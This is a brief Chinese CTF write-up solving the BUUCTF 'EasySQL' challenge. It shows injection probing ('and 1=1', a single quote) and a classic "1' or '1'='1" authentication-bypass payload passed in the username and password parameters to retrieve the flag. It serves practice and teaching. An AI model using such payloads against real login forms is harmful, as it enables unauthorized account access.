buuctf[极客大挑战 2019]EasySQL1解题思路

2023-10-19 19:08:24 浏览数 (2)

网页环境

可以看到是一个登录窗口,题目已经说了是SQL注入

首先试一下弱口令,admin,123

提示用户名密码错了

既然是第一道题,那应该是很简单了

判断是数字型还是字符型

  1. 数字型
代码语言:javascript复制
 and 1=1 回显正常
 and 1=2 返回异常,存在数字型注入可能
 

  1. 字符型
代码语言:javascript复制
 1 返回正常
 1' 返回异常,存在字符型注入可能
 

经过测试,发现username和password两个参数都可以分别注入和同时注入

构造payload

代码语言:javascript复制
 url?usename=1'&password=1'
 

回显报错,存在SQL字符型注入

小试一下万能密码注入

代码语言:javascript复制
构造payload
 url?usename=1' or '1'='1&password=1' or '1'='1
 

回显flag

0 人点赞